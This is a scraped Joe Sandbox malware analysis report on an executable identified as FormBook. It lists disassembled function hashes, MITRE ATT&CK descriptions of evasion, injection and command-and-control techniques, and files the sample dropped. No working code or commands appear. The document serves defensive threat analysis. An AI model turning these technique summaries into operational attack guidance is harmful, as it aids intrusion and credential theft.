Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a2f0757d15bfeacc3eb64b06dedcc570bd8a86ae6e173a520b0e6df1bba326
Instruction ID: cf4b67b50e4ed6d525d40514f7ebc70eab8531e2c04fc692d77c7e86614dd5c2
Opcode Fuzzy Hash: 10a2f0757d15bfeacc3eb64b06dedcc570bd8a86ae6e173a520b0e6df1bba326
Instruction Fuzzy Hash: C2F08231B013189FDB18AB75E45896F7BAAFBC4B15B00882DE44697340CF359802CFA5

Function 05145468 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b239d6b94f4cd71a207331540a9e94b7de86a5b8d4fc61d0d3cb5ee4f72260e
Instruction ID: 0b6520e2e7468e0ffae1074112bb386e6210b1da30843d069bc2d8c9358e67af
Opcode Fuzzy Hash: 0b239d6b94f4cd71a207331540a9e94b7de86a5b8d4fc61d0d3cb5ee4f72260e
Instruction Fuzzy Hash: 5FF0D734E0020DEFCB44EFF8E55989DBFB2FB88201B1084A9E805A7346DF342A42DB40

Function 0514C518 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e99a2e521673194bfe7e2e25a86cf3b60fc7fe4663b31bc77d20c59853ea530
Instruction ID: ee66ca85263330fb52faaee892ced38e270d73bb61768ab46f4efbc409f8da35
Opcode Fuzzy Hash: 3e99a2e521673194bfe7e2e25a86cf3b60fc7fe4663b31bc77d20c59853ea530
Instruction Fuzzy Hash: 85F039B5D4120CBFCB14DFA8D846B9DBBF4EB44300F5081B9E804A2300D7384A02DF81

Function 0514D598 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb24b809c159acdccca4f2363df671dceca506255207b8b0562fe7e6518301d4
Instruction ID: 2ada5110893683c7a24b4c7439e5b83f09ec92319923ef70ee739f891c15ac4a
Opcode Fuzzy Hash: fb24b809c159acdccca4f2363df671dceca506255207b8b0562fe7e6518301d4
Instruction Fuzzy Hash: DFF06D75C11249AFCB14CFA8D541B9EBBB1EF41310F5082AAE8246A790D73A9683DF85

Function 051437DE Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f7b5b82b074ad76ffa03b70e8f46f0ef623da04f8ab29a514d81facdfc4684
Instruction ID: 7c9025c8acce3f2814464c276c973b911c372043ea1e5d62cf21013be8204e89
Opcode Fuzzy Hash: c0f7b5b82b074ad76ffa03b70e8f46f0ef623da04f8ab29a514d81facdfc4684
Instruction Fuzzy Hash: 6EE01AB5A5011DDADB14AB91E6087EEBB71FF45617F201812E2A2B1580C7350580CE91

Function 0514D022 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2f2db9d53503aa721dc73ad1d30bc8044f6b1f0373e9991f52491abb24b6b29
Instruction ID: e822007a0af5f7e145cf6c04f45aee55415b6ebd1fca9942dfc264d725b8cce3
Opcode Fuzzy Hash: a2f2db9d53503aa721dc73ad1d30bc8044f6b1f0373e9991f52491abb24b6b29
Instruction Fuzzy Hash: BCE086B0C1120CEFD740DFB8D846B9E7FB4E744210F5041B9E808E3740E6385A42CB94

Function 0514C528 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b6c2cb6a94b643dbe94801e1c0b76b774662d64750a7ae979c558f488fd25cd
Instruction ID: bca71f9f442290f88f46bdfd7d1261ecbeabb27a90359aa4f8a5140230f01603
Opcode Fuzzy Hash: 9b6c2cb6a94b643dbe94801e1c0b76b774662d64750a7ae979c558f488fd25cd
Instruction Fuzzy Hash: 88E07EB4E0520CAFCB54DFA9D54AA9DBBB5EB48300F1081AAA814A2350EB345A51DF85

Function 0514D5A8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8531e156977984bc9a705f34b67bff95bcd3c43934a1b1f77b35b4765f5c3d63
Instruction ID: 684fc20ef5886a4ef5407226482d145fca60bf1118c34117115ee18fa0da60f5
Opcode Fuzzy Hash: 8531e156977984bc9a705f34b67bff95bcd3c43934a1b1f77b35b4765f5c3d63
Instruction Fuzzy Hash: D9E01AB0D0120CEFCB54DFB9D504A9DBBF1EB44300F5081A9D804A3300E7359A51DF80

Function 05147066 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 302f274d142c50b89aa02611c8838f865695f567ab576aadb22eca3cb1722d9e
Instruction ID: e618a95a0f9ffec7fb4ef0bbd78c18ba42b83be98a2206f1d85bf03e93f61118
Opcode Fuzzy Hash: 302f274d142c50b89aa02611c8838f865695f567ab576aadb22eca3cb1722d9e
Instruction Fuzzy Hash: C7F074B4D002A8CFEB50DF94C45879CBBB1BB0A345F049596E40AB7244D7785D85CF51

Function 0514771B Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa13d3e97ef05d8047395e938a3225c9a7b212a824aff8b817b0b1cb8211c84e
Instruction ID: 8df8150b7eb05fe9c4cf20bbbf01220ef2025ed4a1e4356e8e2e6f5777832d12
Opcode Fuzzy Hash: aa13d3e97ef05d8047395e938a3225c9a7b212a824aff8b817b0b1cb8211c84e
Instruction Fuzzy Hash: 85F07FB4C00228CFEB50DFD4D85979CBBF0BB09345F145096E50AB7284DB784989CF14

Function 051470B7 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77d63b604a0e997cd0f36cc50cf22e67e5b7065f43207275359970e9d6daf2c0
Instruction ID: b10151ee3949ea2e9f70d8e1e23cbffa57dbe197b234ddaef0a60d336bff2469
Opcode Fuzzy Hash: 77d63b604a0e997cd0f36cc50cf22e67e5b7065f43207275359970e9d6daf2c0
Instruction Fuzzy Hash: 10F07FB4D15228CBEB24DF68C9587D8BBB1BB0A341F0454E6E50DE2250D7384A81CE00

Function 05147013 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50610cb1f8e32d2220ed34ac59f5adcd3be0bec10ffc1928f88df56e50f3980
Instruction ID: 508dd7dbc907f94140236b8c2e9ad6027cbe0d216284d32d91045e0b66a72966
Opcode Fuzzy Hash: b50610cb1f8e32d2220ed34ac59f5adcd3be0bec10ffc1928f88df56e50f3980
Instruction Fuzzy Hash: 2FF0A5B4C04229CFEB10DF94C409B9CBBF0BB0A345F0055A6E40AF7640D7794985CF10

Function 0514D030 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0518c9ecb60b965cb2243196900febc44eec9d22a3f13ac4da11d679a0edae65
Instruction ID: c2b65e902e7971386877164b783466f3a3e41ee64b2402d56b5a8c96d059a941
Opcode Fuzzy Hash: 0518c9ecb60b965cb2243196900febc44eec9d22a3f13ac4da11d679a0edae65
Instruction Fuzzy Hash: 26E0E2B0D1520CEFCB44EFB8E54AAACBFB4AB04205F5001A9A808A3340EA345A85CB81

Function 0514776A Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc3b8a760d3318b17b2a193f3080f1f815e20a96ebf2632e26c9a221e7d2bf3
Instruction ID: 7407fe80a7698216d88bf771c3f8395ebbc1850c339dfc2cb732aaa3e0874541
Opcode Fuzzy Hash: 4fc3b8a760d3318b17b2a193f3080f1f815e20a96ebf2632e26c9a221e7d2bf3
Instruction Fuzzy Hash: C9E09274D04268CFEB009FD4D41C79CBBB1FB06346F445526E806AB284CB7C4889CF01

Function 051474B3 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c97bbe0de610b4df71af58a3c16e8caf685c016592bf1f48b6744df85a664af5
Instruction ID: b7330fa602825e64f382c57e33359bdb3c9f721a57acba12e11e9e88b6e6f07b
Opcode Fuzzy Hash: c97bbe0de610b4df71af58a3c16e8caf685c016592bf1f48b6744df85a664af5
Instruction Fuzzy Hash: FDE0BD78D002688BDBA0CFA0C85878DBBB1BB09300F1085AAD40EB3240DB380E85CF00

Function 051440A0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10db6592932a660debb61d336db97d9a7a06498ce6f660fb78ff2fe63c3c9f9a
Instruction ID: 441b8d5680652bdcea5f8915da14ca774962729330214d83a058907eda8b3fb7
Opcode Fuzzy Hash: 10db6592932a660debb61d336db97d9a7a06498ce6f660fb78ff2fe63c3c9f9a
Instruction Fuzzy Hash: F0B09B2171413B13D504319DA41459D738D8B85960F440567D51D97745CDC79C4107D9

Function 05146D14 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71980fcb48ae99401f36a1efefcedb98d7fd73d62cf07f92929e17e922994061
Instruction ID: 49365def3cf764ee8343b970a5b8bf2d3d4fa3b1008b0293a875dfd97bcd5dce
Opcode Fuzzy Hash: 71980fcb48ae99401f36a1efefcedb98d7fd73d62cf07f92929e17e922994061
Instruction Fuzzy Hash: C6C04C3A1552089A9655E750C98491ABEE6BF95710B81D852A14455021C721C5189B1A

Function 0514B2D4 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6df5b788256b5a1693adeea685ec5d8b54b2672639cbcafaa60bb5707014360f
Instruction ID: d6569e15e3e5d66f5a684bf0e35e36f0d82d5228e905daa6633354cc0e08276d
Opcode Fuzzy Hash: 6df5b788256b5a1693adeea685ec5d8b54b2672639cbcafaa60bb5707014360f
Instruction Fuzzy Hash: 64B0123629A704B26824A2B0DC84F2ED865BBE1F00FC0BC03B20414050CB209829AA5F

Function 05148260 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b0538a7c1edb2d3270b73cfa2ffa4ac8d3e522971071494c36f365b813ad955
Instruction ID: 004fc3ed390d5fe19836d1426a91cc1ffd586af75e16a879d2890c980e121236
Opcode Fuzzy Hash: 9b0538a7c1edb2d3270b73cfa2ffa4ac8d3e522971071494c36f365b813ad955
Instruction Fuzzy Hash: 41A0017486A209EAD7248A61D00D66C7A65A704709F059896E412656418B7801859E11

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report po8909893299832.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InXlDTKncKkCk.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\po8909893299832.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05pywxbk.xl0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20dknizx.5to.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_clng4yge.m2v.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emer1xxt.5gr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fitxycg0.fkb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olj4z0jo.grd.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsf0gbqu.3qj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vusijrf1.ihu.psm1

Windows Analysis Report
po8909893299832.exe